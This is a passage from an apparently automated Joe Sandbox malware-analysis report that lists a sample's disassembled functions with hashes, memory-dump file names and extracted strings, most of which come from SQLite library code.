                                                                                                                                                                                                                  • Instruction ID: 6f2a8c3d2e6040991ddf53a17994a0dea3c567da04710d0605861acf2773ded7
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fe7376a9f3cbe8ba2ff67ed1f805d9e0ad474f09f004b43e5cd3b66e7842909
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4772BE73608A858AD720DF15D5A0BAD7BA1F785F88F24C236DB8E4775ACB79E411CB00
                                                                                                                                                                                                                  Function 00007FFD943C81A0 Relevance: 4.5, Strings: 3, Instructions: 704COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: malformed JSON$null$string or blob too big
                                                                                                                                                                                                                  • API String ID: 0-759322337
                                                                                                                                                                                                                  • Opcode ID: 5569c515b0de28c6886f2633f4a32bdbd455d526f1b924a5b235b4abbe687c3f
                                                                                                                                                                                                                  • Instruction ID: 6424c09671cdebb51385b13b4708ba37de3601d2f68b8cb5ae21a5de54a4c3e5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5569c515b0de28c6886f2633f4a32bdbd455d526f1b924a5b235b4abbe687c3f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F728122B49B4185FB34EBB5D1A43BD23A2AB4275AF14823ACE5D177DACE7DE105C340
                                                                                                                                                                                                                  Function 00007FFD9448017B Relevance: 4.4, Strings: 3, Instructions: 635COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: USING INDEX %s FOR IN-OPERATOR$USING ROWID SEARCH ON TABLE %s FOR IN-OPERATOR$f
                                                                                                                                                                                                                  • API String ID: 0-872296338
                                                                                                                                                                                                                  • Opcode ID: 788ee33ec5ce138017216ac8b7e4bc0c801700c22262fcc75c91219f85bc8ad7
                                                                                                                                                                                                                  • Instruction ID: 72d09ac4ebb084d8f7586518b70983b6b46c114302e9ba944006d099282f8f8e
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 788ee33ec5ce138017216ac8b7e4bc0c801700c22262fcc75c91219f85bc8ad7
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2552E272B29A8585EBB08B55D0A077D77A0FB86B88F46C131DE4D5379ADFB8D481C700
                                                                                                                                                                                                                  Function 00007FFD943DC3E0 Relevance: 4.4, Strings: 3, Instructions: 616COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                  • API String ID: 0-4001610065
                                                                                                                                                                                                                  • Opcode ID: 1839563d8324d911c904a3c1144395b8bdc0345a41817bb47b604a5c17a10f4f
                                                                                                                                                                                                                  • Instruction ID: 34d4eb117a4cc5d6bbe4e0e3b647b33bda4ef68ca6082696590799d66c09719d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1839563d8324d911c904a3c1144395b8bdc0345a41817bb47b604a5c17a10f4f
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2842BE32B19B8286EB60EFB5D4B476937A0FB8AB84F118136DA4D43396DF3AD445C740
                                                                                                                                                                                                                  Function 00007FFD94464C90 Relevance: 4.1, Strings: 3, Instructions: 392COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                  • API String ID: 0-4001610065
                                                                                                                                                                                                                  • Opcode ID: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                                  • Instruction ID: 6b651c3fcef3edad77edfc08fac586f3fd32286dab67906a5ae8b48803ccce9f
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6c603e39f9a3097107824c9f55f133f55402164eb61ae80f1fad4887f2c54ecc
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E302D232B0878686E7788F91E4A46AA73A1FB46B94F01C036DB4D4775ADF7DE484C740
                                                                                                                                                                                                                  Function 00007FFD944BD0D0 Relevance: 4.0, Strings: 3, Instructions: 225COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %r $%sON CONFLICT clause does not match any PRIMARY KEY or UNIQUE constraint$r
                                                                                                                                                                                                                  • API String ID: 0-654222969
                                                                                                                                                                                                                  • Opcode ID: ad659b394992e0a6b6c543752e7c97d3fce774d2446fd25953ee4ab8318358a0
                                                                                                                                                                                                                  • Instruction ID: 1f143dae34d13b71ea22be6ce735cc0fecc88fa210a894f40715fcf02d598286
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad659b394992e0a6b6c543752e7c97d3fce774d2446fd25953ee4ab8318358a0
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DFA1A072B18B8185F724CFA5D8902AD77A0FB4A788F059275EE8D53A5ADF7CD490C700
                                                                                                                                                                                                                  Function 00007FFD943DF5A0 Relevance: 3.9, Strings: 3, Instructions: 177COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: %s at line %d of [%.10s]$2aabe05e2e8cae4847a802ee2daddc1d7413d8fc560254d93ee3e72c14685b6c$database corruption
                                                                                                                                                                                                                  • API String ID: 0-4001610065
                                                                                                                                                                                                                  • Opcode ID: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                                                  • Instruction ID: 39a0d1840989939bd3f60754994d538183e61cc9143c650eeaf919e744048cff
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e9ba09a2d25743db847674225f457755739cea2aeed368362171beb30f9384af
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E161D662B1865142EB74AFB6D5E017D27A1FB4ABC4F148239DE0D47B52CF3AE892C740
                                                                                                                                                                                                                  Function 00007FFD944225A0 Relevance: 3.7, Strings: 2, Instructions: 1161COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: DELETE FROM '%q'.'%q_data' WHERE id>=? AND id<=?$DELETE FROM '%q'.'%q_idx' WHERE segid=?
                                                                                                                                                                                                                  • API String ID: 0-1811289845
                                                                                                                                                                                                                  • Opcode ID: eef41fb7f114bcfe4d16fc0673e998ea073ffb144c4b080610bcc27783baa952
                                                                                                                                                                                                                  • Instruction ID: cefea78a485f2d7a4b8ce20061576ece754d2aee0f076825e4c5346b59d1779b
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eef41fb7f114bcfe4d16fc0673e998ea073ffb144c4b080610bcc27783baa952
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 42C27F72B08B8286EB64CFA5D4A43BD77A1FB46B88F058135DA4D4779ADFB8E540C700
                                                                                                                                                                                                                  Function 00007FFD944F6430 Relevance: 3.6, Strings: 2, Instructions: 1082COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: BINARY$f
                                                                                                                                                                                                                  • API String ID: 0-3633891179
                                                                                                                                                                                                                  • Opcode ID: 96c0fec2a1a826bfe5deedcdc11cb00a3005dbadaa3c09ccc1ce74af67b67547
                                                                                                                                                                                                                  • Instruction ID: e945fb08333dba807c604073e76fb5f33350424d85d16d033f7fdd5ce690d4db
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96c0fec2a1a826bfe5deedcdc11cb00a3005dbadaa3c09ccc1ce74af67b67547
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06B2DF72B18A8186EB748F95D1A0BB97BA1FF82B84F51C179CA8D4778ADF78D411C700
                                                                                                                                                                                                                  Function 00007FFD94476690 Relevance: 3.3, Strings: 2, Instructions: 825COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: @$rows deleted
                                                                                                                                                                                                                  • API String ID: 0-3120709674
                                                                                                                                                                                                                  • Opcode ID: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                                                  • Instruction ID: 41fbbebef05b64838b770523cebe0f29d34d5c476bf3008b514f56650a34d7c5
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1760b45886ef156f09229601bb7b9ed7295d86ea181ee365c454bfb11108a558
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A6828E727087818AEB74DB6590907AAB7A1FB86B84F04C135DB8D47B9ADF7CE451CB00
                                                                                                                                                                                                                  Function 00007FFD9450F3A8 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                  • API String ID: 15204871-0
                                                                                                                                                                                                                  • Opcode ID: 72693b367b06d973c6b9c9c036ff7499f212e3846da383bcbde54d42566cdc3a
                                                                                                                                                                                                                  • Instruction ID: 7944f451a8d9312271d0ab1aa7837ff7655cfae2e370ba50d7121cbefc8e7849
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 72693b367b06d973c6b9c9c036ff7499f212e3846da383bcbde54d42566cdc3a
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2AB19C77600B888BEBA6CF69C89636C3BA0F745B48F19C921DB5D837A9CB79D451C700
                                                                                                                                                                                                                  Function 00007FFD944965F0 Relevance: 3.1, Strings: 2, Instructions: 571COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: content$docsize
                                                                                                                                                                                                                  • API String ID: 0-1024698521
                                                                                                                                                                                                                  • Opcode ID: 3918f8373233c2cbb061220b3d40992d4c8946e68b096bb4ca700483b9b14d60
                                                                                                                                                                                                                  • Instruction ID: 039f496207cb350583faae4d4044fbb174cd7ec9648b06bf6610cb7b83ea60f6
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3918f8373233c2cbb061220b3d40992d4c8946e68b096bb4ca700483b9b14d60
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F423825B09A0286EB759BE6D5E467923A1FF46B88F058435CE0D4B69ADFBCE844D300
                                                                                                                                                                                                                  Function 00007FFD944E8830 Relevance: 2.9, Strings: 2, Instructions: 379COMMONLIBRARYCODE
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: $recovered %d frames from WAL file %s
                                                                                                                                                                                                                  • API String ID: 0-3175670447
                                                                                                                                                                                                                  • Opcode ID: a09f9c7bbce053fb535f404b7bf89ebe573d68902540534e6087ba50ee00e041
                                                                                                                                                                                                                  • Instruction ID: c13e63f5561a61c4e118b10091cedf19251f391a59c973863ce5908021a6943d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a09f9c7bbce053fb535f404b7bf89ebe573d68902540534e6087ba50ee00e041
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26F1C332B0878686EB709F66E09076F77A0FB86B98F119135DA8D87759DF78E444CB00
                                                                                                                                                                                                                  Function 00007FFD9443E770 Relevance: 2.8, Strings: 2, Instructions: 340COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453421962.00007FFD94553000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453442868.00007FFD94556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ffd943b0000_StL9joVVcT.jbxd
                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                  • String ID: -- TRIGGER %s$out of memory
                                                                                                                                                                                                                  • API String ID: 0-3478380517
                                                                                                                                                                                                                  • Opcode ID: 23aabf06f57b6786606c5325c3a9138d2184255b20b78c424074b3fddfd34c14
                                                                                                                                                                                                                  • Instruction ID: 44f18192702d2cc5e2805e2e719645e6f6840aec92dbf7c88dcaedb184d4ee1d
                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 23aabf06f57b6786606c5325c3a9138d2184255b20b78c424074b3fddfd34c14
                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3CF18232B0AB8586EB70DF65D5A02AD33A0FB85B84F248136DB8D4779ADF78E051C700
                                                                                                                                                                                                                  Function 00007FFD94453612 Relevance: 2.8, Strings: 2, Instructions: 301COMMON
                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                  • Source File: 00000000.00000002.2453227477.00007FFD943B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFD943B0000, based on PE: true
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453204340.00007FFD943B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453347136.00007FFD94514000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453381481.00007FFD9454D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                  • Associated: 00000000.00000002.2453402918.00007FFD94552000.00000008.00000001.01000000.00000007.sdmpDownload File
